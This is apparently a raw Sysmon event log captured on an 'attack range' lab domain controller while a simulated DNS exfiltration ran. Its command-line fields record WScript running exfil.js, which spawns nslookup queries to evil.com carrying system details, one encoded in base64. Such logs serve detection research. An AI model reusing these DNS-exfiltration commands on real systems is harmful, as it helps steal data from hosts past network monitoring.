14:21:33.877{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-F443-000000005F02}1692C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.877{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-F443-000000005F02}1692C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.859{2E1864BB-18ED-629A-F443-000000005F02}16922516C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-F343-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000209687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.759{00000000-0000-0000-0000-000000000000}7408evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.677{00000000-0000-0000-0000-000000000000}6432evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.612{00000000-0000-0000-0000-000000000000}3868evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.549{00000000-0000-0000-0000-000000000000}6984evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.472{00000000-0000-0000-0000-000000000000}8132evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.409{00000000-0000-0000-0000-000000000000}5196evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.314{00000000-0000-0000-0000-000000000000}7964evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000209680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.859{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F443-000000005F02}1692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000209679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.238{00000000-0000-0000-0000-000000000000}2704evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.161{00000000-0000-0000-0000-000000000000}8112evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000209677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.046{00000000-0000-0000-0000-000000000000}4728evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000209676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.844{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F343-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.844{2E1864BB-18E0-629A-6742-000000005F02}39764808C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-F343-000000005F02}2512C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.853{2E1864BB-18ED-629A-F343-000000005F02}2512C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzxn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.844{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldbyghk.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.828{2E1864BB-18ED-629A-F143-000000005F02}74367396C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-F243-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.828{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.828{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F243-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.828{2E1864BB-18ED-629A-F043-000000005F02}62247588C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-F243-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.833{2E1864BB-18ED-629A-F243-000000005F02}2764C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-F043-000000005F02}6224C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldbyghk.tmp 2>&1 10341000x8000000000000000209660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.812{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-F143-000000005F02}7436C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.812{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-F143-000000005F02}7436C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.797{2E1864BB-18ED-629A-F143-000000005F02}74367396C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-F043-000000005F02}6224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000209657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.407{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50743- 354300x8000000000000000209656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.312{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50742- 354300x8000000000000000209655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.312{00000000-0000-0000-0000-000000000000}7964<unknown process>-udptruefalse127.0.0.1-50742-false127.0.0.1-53domain 354300x8000000000000000209654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.312{00000000-0000-0000-0000-000000000000}7964<unknown process>-udpfalsefalse127.0.0.1-50741-false127.0.0.1-53domain 354300x8000000000000000209653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.312{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50741- 354300x8000000000000000209652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.311{00000000-0000-0000-0000-000000000000}7964<unknown process>-udpfalsefalse127.0.0.1-50740-false127.0.0.1-53domain 354300x8000000000000000209651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.311{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50740- 354300x8000000000000000209650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.236{00000000-0000-0000-0000-000000000000}2704<unknown process>-udpfalsefalse127.0.0.1-50739-false127.0.0.1-53domain 354300x8000000000000000209649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.236{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50739- 354300x8000000000000000209648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.236{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50738- 354300x8000000000000000209647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.236{00000000-0000-0000-0000-000000000000}2704<unknown process>-udptruefalse127.0.0.1-50738-false127.0.0.1-53domain 354300x8000000000000000209646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.235{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50737- 354300x8000000000000000209645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.235{00000000-0000-0000-0000-000000000000}2704<unknown process>-udptruefalse127.0.0.1-50737-false127.0.0.1-53domain 354300x8000000000000000209644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.159{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50736- 354300x8000000000000000209643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.159{00000000-0000-0000-0000-000000000000}8112<unknown process>-udpfalsefalse127.0.0.1-50735-false127.0.0.1-53domain 354300x8000000000000000209642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50735- 354300x8000000000000000209641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.158{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50734- 10341000x8000000000000000209640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.781{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F143-000000005F02}7436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.781{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 